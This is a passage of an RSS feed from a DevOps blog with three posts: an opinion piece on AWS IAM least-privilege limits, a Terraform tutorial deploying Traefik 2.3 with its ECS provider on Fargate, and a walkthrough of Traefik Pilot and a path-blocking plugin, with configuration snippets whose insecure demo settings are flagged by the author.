nightmare]]></title><description><![CDATA[<p>I have been using AWS professionally for over 4 years now.</p><p>To be a bit old-fashioned, when I started on AWS, the following services and features did not exist:</p><ul><li>The ALB/NLB</li><li>ACM</li><li>ElasticSearch Service</li><li>Lambda inside a VPC or with the duration of more than 5 minutes</li><li>ECS/EKS/</li></ul>]]></description><link>https://en.tferdinand.net/aws-iam-between-dream-and-nightmare/</link><guid isPermaLink="false">6337ff9a65fbc6000155a562</guid><category><![CDATA[AWS]]></category><category><![CDATA[CloudFormation]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Security]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Sun, 16 Aug 2020 04:51:07 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/08/images-gratuites-libres-de-droits-sans-droits-d-auteur-84.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/08/images-gratuites-libres-de-droits-sans-droits-d-auteur-84.jpg" alt="AWS IAM: Between dream and nightmare"><p>I have been using AWS professionally for over 4 years now.</p><p>To be a bit old-fashioned, when I started on AWS, the following services and features did not exist:</p><ul><li>The ALB/NLB</li><li>ACM</li><li>ElasticSearch Service</li><li>Lambda inside a VPC or with the duration of more than 5 minutes</li><li>ECS/EKS/ECR</li></ul><p>During these 4 years, I had the opportunity to do a lot of IAM, essential to deploy secure solutions on Amazon.</p><h2 id="iam-and-least-privilege">IAM and least privilege</h2><p>Identity and Access Management (IAM) is the AWS service that defines users or roles and their associated permissions.</p><p>By following the precepts of the AWS well architected framework, the good practice is to assign the finest possible rights for our application to work.</p><p>Why this? Several reasons here:</p><ul><li>If my application were to be compromised, I limit the impact as much as possible, because the attacker will only have restricted access to my infrastructure.</li><li>This can allow me to detect abnormal behavior of my infrastructure, if I see a lot of access denied for the role of my EC2 on APIs that it is not supposed to exploit.</li><li>It is a good general hygiene practice in IS to limit as much as possible the perimeter accessible by an application.</li></ul><h2 id="the-tools-provided">The tools provided</h2><p>In order to position fine rights, AWS allows the creation of policies to indicate the scope of a user or a role.</p><p>This tool describes, in JSON format, the rights to be applied. This gives in a very basic way something of this type :</p><!--kg-card-begin: html--><pre class="language-json line-numbers"><code>{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Sid&quot;: &quot;mapolicyS3&quot;,
      &quot;Action&quot;: [
        &quot;s3:CreateBucket&quot;
      ],
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Resource&quot;: &quot;arn:aws:s3:::demo-bucket-tferdinandnet&quot;
    }
  ]
}
</code></pre><!--kg-card-end: html--><p>As you can see, the policies are human readable and allow for more or less efficient filtering across all API calls and AWS resources.</p><p>To assist in the creation of these policies, AWS provides several tools, including : </p><ul><li>Policy generator: <a href="https://awspolicygen.s3.amazonaws.com/policygen.html?ref=en.tferdinand.net">https://awspolicygen.s3.amazonaws.com/policygen.html</a></li><li>Policy simulator: <a href="https://policysim.aws.amazon.com/?ref=en.tferdinand.net">https://policysim.aws.amazon.com/</a> (only accessible once logged into an AWS account)</li></ul><p>In addition, there is documentation of the APIs, with their filtering and resource naming scheme on the official website: <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_actions-resources-contextkeys.html?ref=en.tferdinand.net">https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_actions-resources-contextkeys.html</a>.</p><h2 id="so-everything-s-perfect">So everything&apos;s perfect?</h2><p>NO! There are indeed a certain number of tools and documentation on AWS, which will answer a good part of the use cases, as long as you don&apos;t try to really make the least privilege ...</p><p>Why is that?</p><h3 id="limits">Limits</h3><p>First of all, I&apos;m going to talk about AWS limits. There are two types of limits on AWS:</p><ul><li>Soft limits: these limits are mainly there to protect the customer from misusing AWS and making his bill explode, and can be changed with a support ticket.</li><li>Hard limits: These limits apply identically to all AWS accounts and cannot be modified under any circumstances.</li></ul><p>It is important to note that the limits on Amazon&apos;s MRI can be reached fairly quickly when trying to severely restrict resource rights, as policies quickly become very verbose.</p><p>As an example, you can put a maximum of 10 managed policies on a role or user, with a limit of 6144 characters for each one (without counting spaces), to give an example of the least privilege on a &quot;strong&quot; service like RDS can easily exceed 10,000 characters...</p><p>For more information on the limits, I invite you to consult the associated page: <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html?ref=en.tferdinand.net">https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html</a>.</p><h3 id="heterogeneity">Heterogeneity</h3><p>If limits were the only problem... We can also talk about the heterogeneity of resource filtering, some are based on the ARN, some on the name of the resource, some on an ID generated at the time of its creation... Concerning this case, it is almost impossible to manage restricted privileges, because to restrict the right to create/modify the resource, it must already exist!</p><p>Also, the available conditions are not always the same, or even do not have the same names. A simple filtering on a tag (quite basic on AWS) may not be possible depending on the resources, or the API call made.</p><h3 id="the-support-is-out-">The support is out...</h3><p>Because of the problems I have mentioned above, I had to contact support several times for anomalies that I could not explain.</p><p>Apart from the fact that I&apos;ve been told very frequently &quot;Yeah, your policies are complicated&quot;, in most cases, support is useless at best. At worst, it meets my need, not understanding that my job is to secure deployments and infrastructure in AWS...</p><p>The support is the champion of the wildcard (*), a magical tool that you wield when you can&apos;t find it. The support solution is very often to pass the API call as a wildcard resource or the API itself.</p><p>The concern is that from then on, we don&apos;t make any more minimum privilege, we certainly restrict, but very far from the minimum...</p><p>I could also talk about the tickets I&apos;ve been opening lately. They were once again known bugs in the IAM AWS that could only be circumvented by wildcard, without any resolution date being given to us .</p><h2 id="in-conclusion">In conclusion</h2><p>You&apos;d think with my last paragraphs that I would find AWS&apos;s IAM completely off the mark, but that&apos;s not the case.</p><p>I&apos;m aware that resource filtering is a complex thing to understand and implement, and Amazon is far from being a bad student at this point.</p><p>However, I think Amazon would win by giving real examples of least privilege in their documentation instead of inserting wildcards everywhere. It also creates tensions when people like me want to restrict rights since many users don&apos;t understand why we are moving away from AWS documentation.</p><p>Moreover, the limits on the IAM are aberrant and unnecessary, they just push to give wider rights to save precious characters and make their automation more complex.</p><p>Security is a major issue for companies, let&apos;s hope AWS hears them!</p>]]></content:encoded></item><item><title><![CDATA[Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS]]></title><description><![CDATA[<p></p><p>Traefik is a reverse proxy that we have <a href="https://en.tferdinand.net/tag/traefik/">already mentioned on this blog in the past</a>. Very powerful coupled with containers, it allows a fine and light management of traffic.</p><p>A few days ago, Containous, the editor of Traefik, <a href="https://community.containo.us/t/traefik-realease-v2-3-0-rc2/6942?ref=en.tferdinand.net">announced the release of Traefik 2.3.0-rc2</a>. This new version</p>]]></description><link>https://en.tferdinand.net/traefik-2-3-ecs-fargate-reverse-proxy-serverless-in-aws/</link><guid isPermaLink="false">6337ff9a65fbc6000155a561</guid><category><![CDATA[Traefik]]></category><category><![CDATA[Amazon]]></category><category><![CDATA[ECS]]></category><category><![CDATA[Fargate]]></category><category><![CDATA[Terraform]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Wed, 29 Jul 2020 15:45:30 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/07/TED-AWS-TRAFFIC.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/07/TED-AWS-TRAFFIC.jpg" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS"><p></p><p>Traefik is a reverse proxy that we have <a href="https://en.tferdinand.net/tag/traefik/">already mentioned on this blog in the past</a>. Very powerful coupled with containers, it allows a fine and light management of traffic.</p><p>A few days ago, Containous, the editor of Traefik, <a href="https://community.containo.us/t/traefik-realease-v2-3-0-rc2/6942?ref=en.tferdinand.net">announced the release of Traefik 2.3.0-rc2</a>. This new version brings some changes, including :</p><ul><li>The addition of a new service: Traefik Pilot.</li><li>The ability to add plugins to Traefik</li><li>The addition of the ECS provider</li></ul><p>I have already covered the first two points on this blog and I will focus here on the support of the ECS (Elastic Container Service) backend on AWS via a new Traefik provider.</p><p><strong>Disclaimer :</strong> This post is a translated version of the blog post I made for my company, you can find the french version <a href="https://blog.wescale.fr/2020/07/29/traefik-2-3-ecs-fargate-reverse-proxy-serverless-dans-aws/?ref=en.tferdinand.net">here</a>, on WeScale blog.</p><h2 id="traefik-in-the-land-of-providers">Traefik in the land of providers</h2><h3 id="what-s-a-provider">What&apos;s a provider?</h3><p>Like Terraform, Traefik uses a notion of provider to define the services it will connect to.</p><p>Each provider has its own vocabulary and configuration. The basic idea is of course to have a light kernel, Traefik, and to load only the providers we use.</p><p>There are now about fifteen providers available for Traefik, such as Docker, Kubernetes, Rancher, Etcd, Consul etc...</p><p>The provider is the data source that Traefik will use to discover the backends it will connect to.</p><h2 id="why-the-addition-of-the-ecs-provider-changes-the-game">Why the addition of the ECS provider changes the game</h2><p>A bit of context: ECS is the AWS managed orchestrator, it allows to drive containers on EC2 or on another service, Fargate, which allows to run its containers in serverless mode.</p><p>In Fargate, we simply reserve resources, and Amazon takes care of the underlying infrastructure for us (because serverless is not magic).</p><p>The addition of the ECS provider allows Traefik to dynamically discover ECS driven resources, in order to attach them directly to itself, which gives more dynamism in your deployments. This discovery is based on Traefik itself using polling via AWS APIs.</p><p>Moreover, it allows not to have one AWS ALB per resource, or with a lot of rules, but just one that sends back to Traefik, and it is the latter that takes care of all the routing. Enough to interconnect Traefik with ECS wherever it is deployed. The example here reuses ECS for simplicity, it is not necessary, you can host it wherever you want.</p><h2 id="the-provider-in-action">The provider in action</h2><h3 id="disclaimer">Disclaimer</h3><p>I therefore propose a small hands-on using this provider, with a small disclaimer:</p><ul><li>This hands-on is made on a &quot;Release candidate&quot; version, so the final version can be slightly different.</li><li>It is realized with Terraform, which is absolutely not a prerequisite, you can achieve the same result with CloudFormation for example</li><li>A bug is currently present in the metadata management on ECS, <a href="https://github.com/containous/traefik/issues/7096?ref=en.tferdinand.net">hence the fact that we go through an API Key</a>, which is not a good security practice in AWS.</li><li>This hands-on is a demonstration, in a productive environment, we will implement stronger hardening on some parameters</li></ul><h3 id="what-we-are-going-to-deploy">What we are going to deploy</h3><figure class="kg-card kg-image-card kg-width-full"><img src="https://lh3.googleusercontent.com/W8WP0nZLsGz9JNs1u5jxbbhu1w48DOElXUhug4G0SWLbY4bN-3ryx8B8hwqfydsifr3sh7V9ncHSPraS5FilrcfwgcltcOhd5fOklCA86VY0VGiK_iUFY7aF8NYLdpqvVo65ZopG" class="kg-image" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS" loading="lazy"></figure><h3 id="description-of-the-deployment">Description of the deployment</h3><p>The complete Terraform deployment code <a href="https://gitlab.com/wescalefr-oss/wespeakcloud/traefik-ecs-provider?ref=en.tferdinand.net">is available here</a>.</p><p>I won&apos;t describe here the whole Terraform deployment, as it&apos;s not the heart of this article, I&apos;ll rather focus on the points we are interested in for Traefik, and the nuances to take into account.</p><p><strong>The IAM policy, also used as an IAM user in the example, because of the bug described above :</strong></p><!--kg-card-begin: html--><pre class="language-json"><code>{
    &quot;Version&quot;: &quot;2012-10-17&quot;,
    &quot;Statement&quot;: [
        {
            &quot;Sid&quot;: &quot;TraefikECSReadAccess&quot;,
            &quot;Effect&quot;: &quot;Allow&quot;,
            &quot;Action&quot;: [
                &quot;ecs:ListClusters&quot;,
                &quot;ecs:DescribeClusters&quot;,
                &quot;ecs:ListTasks&quot;,
                &quot;ecs:DescribeTasks&quot;,
                &quot;ecs:DescribeContainerInstances&quot;,
                &quot;ecs:DescribeTaskDefinition&quot;,
                &quot;ec2:DescribeInstances&quot;
            ],
            &quot;Resource&quot;: [
                &quot;*&quot;
            ]
        }
    ]
}</code></pre><!--kg-card-end: html--><p>As can be noted, these are read-only rights on ECS and EC2 services, as ECS can exploit EC2 for its execution nodes.</p><p>Note that it is quite possible to restrict this policy, in a least privilege model, as recommended by AWS, for example by reducing the scope of ECS visible by Traefik, or by allowing only EC2 with a specific tag.</p><p>The policy indicated here is taken from the official documentation.</p><h3 id="deployment-prerequisites">Deployment prerequisites</h3><p>Due to the bug with retrieving role information, it is necessary to create a user and assign him an AWS API key and the policy described above. This user is not provided in the code available on GitLab because <strong>Terraform does not allow the secret access key to be stored securely</strong>. However, if you still want to create this user via Terraform, the following code is required:</p><!--kg-card-begin: html--><pre class="language-hcl"><code>/*
Workaround for issue Traefik#7096 : https://github.com/containous/traefik/issues/7096
*/
 
resource &quot;aws_iam_user&quot; &quot;traefik&quot; {
  name = &quot;traefik&quot;
  path = &quot;/system/&quot;
}
 
resource &quot;aws_iam_access_key&quot; &quot;traefik&quot; {
  user = aws_iam_user.traefik.name
}
 
data &quot;aws_iam_policy_document&quot; &quot;traefik_user&quot; {
  statement {
    sid = &quot;main&quot;
 
    actions = [
      &quot;ecs:ListClusters&quot;,
      &quot;ecs:DescribeClusters&quot;,
      &quot;ecs:ListTasks&quot;,
      &quot;ecs:DescribeTasks&quot;,
      &quot;ecs:DescribeContainerInstances&quot;,
      &quot;ecs:DescribeTaskDefinition&quot;,
      &quot;ec2:DescribeInstances&quot;
    ]
 
    resources = [
      &quot;*&quot;,
    ]
  }
}
 
resource &quot;aws_iam_user_policy&quot; &quot;traefik_user&quot; {
  name   = &quot;traefik_user&quot;
  user   = aws_iam_user.traefik.name
  policy = data.aws_iam_policy_document.traefik_user.json
}
 
/*Store access keys in Secret manager to retrieve it with Fargate*/
resource &quot;aws_secretsmanager_secret&quot; &quot;traefik_secret_access_key&quot; {
  name        = &quot;traefik-secret_access_key_value&quot;
  description = &quot;contains traefik secret access key&quot;
}
 
resource &quot;aws_secretsmanager_secret_version&quot; &quot;key&quot; {
  secret_id     = aws_secretsmanager_secret.traefik_secret_access_key.id
  secret_string = aws_iam_access_key.traefik.secret
}
 
output &quot;access_key&quot; {
  value = aws_iam_access_key.traefik.id
}
 
output &quot;secret_id&quot; {
  value = aws_secretsmanager_secret.traefik_secret_access_key.id
}
</code></pre><!--kg-card-end: html--><h2 id="the-settings-of-the-ecs-tasks">The settings of the ECS tasks</h2><h3 id="traefik-s-task-force-is-quite-simple-">Traefik&apos;s task force is quite simple:</h3><!--kg-card-begin: html--><pre class="language-json"><code>[
    {
      &quot;name&quot;: &quot;traefik&quot;,
      &quot;image&quot;: &quot;traefik:v2.3.0-rc2&quot;,
      &quot;entryPoint&quot;: [&quot;traefik&quot;, &quot;--providers.ecs.clusters&quot;, &quot;${ecs_cluster_name}&quot;, &quot;--log.level&quot;, &quot;DEBUG&quot;, &quot;--providers.ecs.region&quot;, &quot;${region}&quot;, &quot;--api.insecure&quot;],
      &quot;essential&quot;: true,
      &quot;logConfiguration&quot;:{
        &quot;logDriver&quot;: &quot;awslogs&quot;,
        &quot;options&quot;: {
            &quot;awslogs-group&quot;: &quot;${loggroup}&quot;,
            &quot;awslogs-region&quot;: &quot;${region}&quot;,
            &quot;awslogs-stream-prefix&quot;: &quot;traefik&quot;
        }
      },
      &quot;Environment&quot; : [{
        &quot;name&quot;: &quot;AWS_ACCESS_KEY_ID&quot;,
        &quot;value&quot;: &quot;${aws_access_key}&quot;
      }],
      &quot;Secrets&quot; :[{
        &quot;name&quot;: &quot;AWS_SECRET_ACCESS_KEY&quot;,
        &quot;valuefrom&quot;: &quot;${secret_arn}&quot;
      }],
      &quot;portMappings&quot;: [
        {
          &quot;containerPort&quot;: 80,
          &quot;hostPort&quot;: 80
        },
        {
          &quot;containerPort&quot;: 8080,
          &quot;hostPort&quot;: 8080
        }
      ]
    }
  ]
</code></pre><!--kg-card-end: html--><p>The important information here is of course the entrypoint. The entrypoint is the command that will be executed by ECS when the container is launched.</p><!--kg-card-begin: html--><div style="font-weight:bold;"><span style="color:blue">traefik</span> <span style="color:red">--providers.ecs.clusters ${ecs_cluster_name}</span> <span style="color:darkorange">--providers.ecs.region ${region}</span> <span style="color:darkgreen">--api.insecure</span></div><!--kg-card-end: html--><p>So when we look at the command line parameters we see:</p><!--kg-card-begin: html--><ul>
    <li><span style="font-weight:bold;color:blue">traefik</span> : The name of the binary to launch, mandatory, since I replace the existing entrypoint in the image.</li>
    <li><span style="font-weight:bold;color:red">--providers.ecs.clusters=${ecs_cluster_name}</span> : This is to name the name of the ECS cluster on which Traefik must search for resources, it is possible to invoke this parameter multiple times, or to tell Traefik to search in all clusters with &quot;--providers.ecs.autoDiscoverClusters=true&quot;.</li>
    <li><span style="font-weight:bold;color:darkorange">--providers.ecs.region=${region}</span> : Although it is not specified in the documentation, this parameter is mandatory in order to use access key authentication.</li>
    <li><span style="font-weight:bold;color:darkgreen">--api.insecure</span> : Purely optional parameter, it allows access to the Traefik dashboard without the need for authentication, on a productive environment, this parameter is of course not activated.</li></ul><!--kg-card-end: html--><p>In addition, we can notice, in environment variables :</p><ul><li>The access key is loaded in plain text, this information is not sensitive, so it doesn&apos;t need to be loaded from secrets manager.</li><li>The secret access key, on the other hand, is loaded from secrets manager, so that it is not visible, although in a &quot;secret&quot; section, it is still loaded as an environment variable, but invisible since the definition of the ECS task.</li></ul><p>I chose to do the configuration via the command line, but it&apos;s quite possible to do it via the Traefik configuration files, for more information about this, I invite you to have a look at the <a href="https://docs.traefik.io/v2.3/providers/ecs/?ref=en.tferdinand.net">official documentation</a>.</p><p><strong>The Whoami taskdefinition, the backend is intended to expose the information used by Traefik :</strong></p><!--kg-card-begin: html--><pre class="language-json"><code>[
    {
      &quot;name&quot;: &quot;whoami&quot;,
      &quot;image&quot;: &quot;containous/whoami:v1.5.0&quot;,
      &quot;essential&quot;: true,
      &quot;portMappings&quot;: [
        {
          &quot;containerPort&quot;: 80,
          &quot;hostPort&quot;: 80
        }
      ],
      &quot;dockerLabels&quot;: 
        {
          &quot;traefik.http.routers.whoami.rule&quot;: &quot;Host(`${alb_endpoint}`)&quot;,
          &quot;traefik.enable&quot;: &quot;true&quot;
        }
      
    }
  ]</code></pre><!--kg-card-end: html--><p>Whoami is a minimalist image, created by Containous for demonstration purposes. It does not require any particular parameters.</p><p>You can see that I add two parameters, via Docker labels on my container :</p><ul><li>&quot;traefik.enable: true&quot; indicates that I&apos;m asking Traefik to reference this service.</li><li>&quot;traefik.http.routers.whoami.rule&quot; indicates that I want to create a Traefik &quot;router&quot; called whoami with a rule to forward all traffic that passes through Traefik. These rules are dynamic and can be more complex, once again, feel free to see the official documentation.</li></ul><h2 id="let-s-deploy-our-infrastructure">Let&apos;s deploy our infrastructure</h2><p>It is now possible to deploy our Terraform code, which will set up our ECS cluster, containers, IAM management and a load balancer front end.</p><p>After a few minutes, our Traefik server is now available.</p><p>You can access the Traefik dashboard via the url of your load balancer (returned by Terraform), on port 8080.</p><p>When you go to the services, you normally see a whoami service, which corresponds to our deployment.</p><p>As you can see on the screenshot below:</p><ul><li>The provider is ECS</li><li>We see our &quot;rule&quot; that we had set on the container</li><li>The 3 deployed containers are clearly visible in the backend.</li></ul><figure class="kg-card kg-image-card kg-width-full"><img src="https://lh4.googleusercontent.com/dwUAnMirXRY6w5lY1E-BE_w5_BTlu1aPhVbwvtpdiO8vzzMvXgRp1Jn5vQ-Jv2Nrt4UUFAA_aKPIMv5e2hEaL5BRX1VsGgcmUA7VeVRhYtYPaMh56mFp-flAyrKQXtiyEhW_vxHP" class="kg-image" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS" loading="lazy"></figure><p>An access to the load balancer url returns the whoami container, when refreshing the page, you should see the IP change, which means that we have load balancing on our service.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://lh3.googleusercontent.com/MuRzaZc3Kq8GDVeLoCWQ9JjBlR1Q2X-FVH3WemU1XyR8X7ZHB7S67AIb9lsaeBX8KsxTmvf2OBnKG84D7zjzshw80SRabnbfqeTy9sQrFX9YMOFM16q_ezY_Wleiwukor7VFz-sn" class="kg-image" alt="Traefik 2.3 + ECS + Fargate : Reverse proxy serverless in AWS" loading="lazy"></figure><h2 id="to-conclude">To conclude</h2><p>Traefik adds a new string to its bow by enabling native discovery of services deployed in ECS.</p><p>At the moment, you can feel that the varnish is not yet dry, due to the bug that I&apos;ve reported, but also due to the fact that the documentation lacks clarity on some aspects. So, I do not recommend you to use this feature in its current state on a production environment, again it is a release candidate, we prefer to wait for the stable version for this use.</p><p>Nevertheless, this french tech product proves once again that it is able to evolve and adapt to the needs of its users. No doubt about the fact that ECS will soon be a provider among others for Traefik.</p><p><br></p>]]></content:encoded></item><item><title><![CDATA[Traefik 2.3 : Towards plugins and beyond!]]></title><description><![CDATA[<p>Traefik 2.3 (codename: Picodon - picodon is a cheese, which you can see in the banner of this article) is available as a release candidate since a few days. More than a simple version increment, it brings a lot of new features.</p><p>Two big new features caught my attention:</p>]]></description><link>https://en.tferdinand.net/traefik-2-3-towards-plugins-and-beyond/</link><guid isPermaLink="false">6337ff9a65fbc6000155a560</guid><category><![CDATA[Traefik]]></category><category><![CDATA[Test]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Docker]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Thu, 23 Jul 2020 06:38:07 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/07/Wikicheese_-_Picodon_-_20150417_-_003.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/07/Wikicheese_-_Picodon_-_20150417_-_003.jpg" alt="Traefik 2.3 : Towards plugins and beyond!"><p>Traefik 2.3 (codename: Picodon - picodon is a cheese, which you can see in the banner of this article) is available as a release candidate since a few days. More than a simple version increment, it brings a lot of new features.</p><p>Two big new features caught my attention:</p><ul><li>The new service of Traefik : Traefik Pilot</li><li>Adding plugin management</li></ul><p>Another new feature, compatibility with ECS will be covered in a future article.</p><h2 id="is-there-a-pilot-in-the-plane">Is there a pilot in the plane?</h2><p>Traefik is a complete and powerful reverse proxy, as I already presented in previous articles. Nevertheless, it lacked a healthcheck solution.</p><p>It is now possible, for free!</p><p>A new service is dedicated to this feature, proposed by Containous (the editor, among others, of Traefik).</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/07/image-18.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="1600" height="900"></figure><p>This service is called Traefik Pilot, it is for the moment very basic and only requires the healthcheck of your Traefik, allowing you to send a notification if it does not answer anymore. It is available at the url <a href="https://pilot.traefik.io/?ref=en.tferdinand.net">https://pilot.traefik.io/</a></p><p>After a quick registration, it is possible to register a Traefik instance.</p><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/07/image-15.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="667" height="776"><figcaption>Fake token, you can always copy it ;)</figcaption></figure><!--kg-card-begin: html--><div style="background:orange; padding:10px;"><h4>Beware of the token</h4><br>
Contrary to what is indicated on the site, you must copy the token without the quotes around it, otherwise you will get a message telling you that the token is invalid! This bug has been reported to Containous, who, I have no doubt, will fix it quickly!</div><!--kg-card-end: html--><p>So I added the command line parameter in the Traefik startup line on Kubernetes.</p><p>After a reboot, you should see your status change to OK.</p><figure class="kg-card kg-image-card"><img src="https://tferdinand.net/content/images/2020/07/image-16.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="426" height="327"></figure><p>However, there are a few things to keep in mind:</p><ul><li>This status currently only corresponds to the status of your Traefik container, and does not mean that the backends are functional.</li><li>This healthcheck is sent from your instance, in &quot;heartbeat&quot; mode, and does not necessarily mean that your server is reachable.</li><li>As the signal is sent in heartbeat, it is also possible to monitor instances in the application area.</li></ul><p>It is then possible, by clicking on your name at the top right, to define alarms, via webhooks or by e-mail.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/07/image-17.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="1026" height="651"></figure><p>Note that it is possible to indicate that you wish to receive security alarms, linked to the discovery of possible CVE on your version of Traefik.</p><h2 id="warm-up-the-plugins">Warm up the plugins</h2><p>I used for many years the very popular Apache httpd. One of the enormous strengths of this product is undoubtedly its modularity, allowing the community to extend its functionality.</p><p>Traefik now allows the use of plugins as well. The list is currently rather small, but I have no doubt that the catalog will grow quickly!</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/07/image-19.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="1013" height="713"></figure><p>Plugins are written in Go, and it is possible to contribute by following <a href="https://github.com/containous/plugindemo?ref=en.tferdinand.net">the guide provided by Containous</a>.</p><p>For the purpose of this article, I chose the &quot;Block Path&quot; plugin edited by Containous. This plugin allows to dynamically block access to certain pages based on regular expressions.</p><p>Blocked pages will directly return a 403 (Forbidden) error.</p><p>The interest of this kind of plugins, already existing in most reverse proxies, is to be able to intercept access to certain pages, and thus prevent the backend from receiving any hit.</p><p>This allows :</p><ul><li>Not to generate a load (for example in the case of an admin page that could be brute force/DDOS).</li><li>To avoid exposing an undiscovered zero day flaw, since the backend does not receive any requests.</li></ul><h3 id="charger-le-plugin">Charger le plugin</h3><p>The loading of the plugin is done via <a href="https://docs.traefik.io/v1.7/basics/?ref=en.tferdinand.net#static-traefik-configuration">the static configuration</a> of Traefik. For my part, I loaded it via the command line parameters, since this is how I chose to load my entire configuration.</p><!--kg-card-begin: html--><pre class="language-yaml line-numbers"><code>       args:
       - --providers.kubernetescrd
       - --accesslog=true
       - --accesslog.filepath=/var/log/traefik/access.log
       - --accesslog.fields.headers.defaultmode=keep
       - --entrypoints.web.address=:80
       - --entrypoints.websecure.address=:443
       - --certificatesresolvers.le.acme.email=myawesomemail@mail.com
       - --certificatesresolvers.le.acme.storage=/cert/acme.json
       - --certificatesResolvers.le.acme.httpChallenge.entryPoint=web
       - --experimental.pilot.token=mytoken
       - --experimental.plugins.demo.moduleName=github.com/containous/plugin-blockpath
       - --experimental.plugins.demo.version=v0.1.2
</code></pre><!--kg-card-end: html--><p>You can see line 12 and 13 the loading of the plugin.</p><p>In my command line, &quot;demo&quot; is the name I gave to the plugin (used just after). moduleName thus contains the path to the GitHub repository containing the plugin, version being the Git version to checkout.</p><p>Once this configuration is done, it is necessary to restart Traefik.</p><h3 id="configuring-the-plugin">Configuring the plugin</h3><p>The plugin then behaves like a classic middleware, if you remember my previous articles, middlewares are components that plug between Traefik and your backend, and can alter the normal behavior. For example, on this page, a middleware allows you to define the necessary security headers.</p><p>For example, I have declared a new middleware in my Kubernetes :</p><!--kg-card-begin: html--><pre class="language-yaml line-numbers"><code>apiVersion: traefik.containo.us/v1alpha1
kind: Middleware
metadata:
  name: demo
spec:
  plugin:
    demo:
      regex: [&quot;^/demo-[a-z]{1,5}&quot;]
</code></pre><!--kg-card-end: html--><p>So we find, in a classic way:</p><ul><li>Line 4: The name of my middleware, which can be different from the name I gave to my plugin.</li><li>Line 6: I tell Traefik that this middleware is a plugin</li><li>Line 7: I indicate the name I gave to my plugin when I loaded it</li><li>Line 8 and following, if needed: I now indicate the configuration of my middleware.</li></ul><p>In my example, I indicated to block any access whose path would start with &quot;/demo-&quot; with 1 to 5 lowercase letters.</p><h3 id="load-middleware">Load middleware</h3><p>Now that I have defined my middleware, I have to load it into my IngressRoute.</p><p>So I modify my IngressRoute by indicating to load this middleware too. As a reminder, you can define multiple middlewares on your IngressRoutes which will be executed in a row.</p><!--kg-card-begin: html--><pre class="language-yaml line-numbers"><code>
apiVersion: traefik.containo.us/v1alpha1
kind: IngressRoute
metadata:
  name: traefik-web-ui-tls
  namespace: default
spec:
  entryPoints:
    - websecure
  routes:
  - kind: Rule
    priority: 1
    match: (Host(`www.tferdinand.net`) || Host(`tferdinand.net`)) &amp;&amp; PathPrefix(`/`)
    services:
    - name: ghost-tfe-fr
      port: 2368
      helthcheck:
        path: /
        host: tferdinand.net
        intervalSeconds: 10
        timeoutSeconds: 5
    middlewares:
      - name: security
      - name: demo
  tls:
    certResolver: le
    options:
      name: mytlsoption
      namespace: default
</code></pre><!--kg-card-end: html--><p>You can see the load on line 23, which will be executed after adding the security headers.</p><h3 id="let-s-test-the-plugin">Let&apos;s test the plugin</h3><p>Now it&apos;s time to test my plugin</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/07/image-20.png" class="kg-image" alt="Traefik 2.3 : Towards plugins and beyond!" loading="lazy" width="567" height="280"><figcaption>Yes, I also use Windows, and I assume it ;)</figcaption></figure><p>You can see that it has the expected behavior, my normal accesses work the same way, the accesses that match the schema I defined are blocked by Traefik directly.</p><h2 id="in-conclusion-a-small-step-for-containous-a-big-step-for-the-community-">In conclusion: A small step for Containous, a big step for the community.</h2><p>Adding plugins and Traefik Pilot are clearly previews at the moment, and don&apos;t allow to take full advantage of their potential, however, this open modularity will allow the community to extend the basic features without making Traefik core heavy.</p><p>It also allows companies to potentially develop their own private plugins and thus adapt Traefik to their needs.</p><p>Pilot is an excellent initiative, and I can&apos;t wait to see how Containous will turn this trial into a top feature!</p>]]></content:encoded></item></channel></rss>